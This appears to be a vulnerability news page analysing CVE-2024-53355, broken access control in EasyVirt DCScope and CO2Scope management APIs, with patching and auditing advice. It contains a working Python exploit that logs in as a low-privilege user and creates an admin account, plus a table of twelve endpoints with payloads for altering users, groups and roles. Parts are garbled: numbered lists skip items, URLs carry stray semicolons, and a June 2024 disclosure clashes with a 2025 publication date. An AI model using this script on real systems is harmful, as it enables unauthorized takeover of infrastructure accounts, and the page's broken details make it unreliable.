CVE CyberSecurity Database News

CVE-2024-53355 - EasyVirt DCScope & CO2Scope Multiple Unauthorized Access Control Flaws — Full Exploit Analysis

Poster -

In June 2024, the vulnerabilities tracked as CVE-2024-53355 were disclosed, affecting EasyVirt DCScope up to version 8.6. and CO2Scope up to version 1.3.. These issues allow remote, authenticated attackers with low-level privileges to perform unauthorized administrative actions through various API endpoints.

In plain terms: If someone logs in—even as a basic user—they can get away with much more than they should: creating admins, manipulating users, changing privileged groups, and more. This long read will break down how these vulnerabilities work, how to reproduce them, and what you should do to protect your infrastructure.

EasyVirt CO2Scope 1.3. and below

These products analyze datacenter energy use and virtual infrastructure, often with privileged access to sensitive IT and environmental data.

How Bad Is It?

CVE-2024-53355 covers a total of 12 sensitive API endpoints. Any low-privileged, authenticated user can:

Add admin roles

10. Modify roles
11. Delete roles
12. List roles

In short: Any valid login can do almost anything an admin can.

The Root Cause: Broken Access Control

The API endpoints fail to properly check or enforce user permissions. All they seem to require is that the user is logged in with *any* account. There is no check for whether the user has admin, manager, or other special privileges—the backend just executes the action.

Exploit Details

Let's see how this might play out with some example code.

API Endpoint

POST /api/user/addalias

Payload to Create a New Admin

{
  "username": "eviladmin",
  "password": "VerySecure123!",
  "role": "admin"
}

With any authenticated user, send a POST request to /api/user/addalias using the above data. The backend will process this and create a new admin, without further authorization checks.

Example Exploit Code (Python)

import requests

# You must have a valid session token or cookies from a low-privilege account
session = requests.Session()
# LOGIN STEP (replace with real credentials)
r = session.post("https://dcscope.yourdomain.com/api/login";, json={
    "username": "lowuser",
    "password": "userpass"
})
# Assume login returns a session cookie

# Exploit: Add admin
payload = {
    "username": "eviladmin",
    "password": "VerySecure123!",
    "role": "admin"
}
r = session.post("https://dcscope.yourdomain.com/api/user/addalias";, json=payload)
print(r.status_code, r.text)

If successful, eviladmin will be able to log in with full rights.

All these endpoints behave similarly—they don't check your admin status

| Action | Method | Endpoint | Example Payload |
|----------------|--------|----------------------------------|----------------------------------------------------------------------|
| Add admin user | POST | /api/user/addalias | {"username": "evil2", "password": "...", "role": "admin"} |
| Modify user | POST | /api/user/updatealias | {"username": "victim", "new_password": "newPass"} |
| Delete user | POST | /api/user/delalias | {"username": "victim"} |
| List users | GET | /api/user/aliases | — |
| Add root group | POST | /api/user/adduser | {"group": "admins"} |
| Modify group | POST | /api/user/updateuser | {"group": "admins", "new_name": "root"} |
| Delete group | POST | /api/user/deluser | {"group": "admins"} |
| List groups | GET | /api/user/users | — |
| Add role | POST | /api/user/addrole | {"role": "superadmin"} |
| Modify role | POST | /api/user/updaterole | {"role": "user", "new_role": "admin"} |
| Delete role | POST | /api/user/delrole | {"role": "user"} |
| List roles | GET | /api/user/roles | — |

*All requests can be made by low-privileged users.*

Denial of service: Users and groups can be deleted, disrupting everyone else.

4. Privilege escalation: Create or modify admin roles and users, permanently changing access control.

This threat is compounded if you expose the affected system to the public Internet or grant many users access.

1. Update

EasyVirt has released updates that address these issues. Upgrade DCScope and CO2Scope to the latest versions.

- DCScope: Get Latest
- CO2Scope: Get Latest

2. Limit Access

Lock down network access so only trusted users/IPs can reach the management interface.

3. Monitor Existing Users

Audit your user and group lists for suspicious accounts or changes made before patching.

4. Change Passwords

Force password resets for all accounts, especially if you suspect compromise.

References

- Original Vendor Website (EasyVirt)
- CVE-2024-53355 NVD Entry *(may become active soon)*
- Exploit-DB *(Search for exploits by CVE ID)*

TL;DR

CVE-2024-53355 makes several core admin APIs in DCScope and CO2Scope accessible to any authenticated user—so anyone with a login can become admin, delete users, or edit groups. Fix it NOW by patching, restricting access, and auditing for rogue admin accounts.


Stay secure!
If you have questions or want a live demo, reach out or comment below.
Always patch before exploits go public.


*This exclusive analysis by ChatGPT (June 2024). If you share it, please credit the source and verify with your security team before running any exploits on your systems.*

Timeline

Published on: 01/31/2025 22:15:09 UTC
Last modified on: 02/07/2025 16:15:37 UTC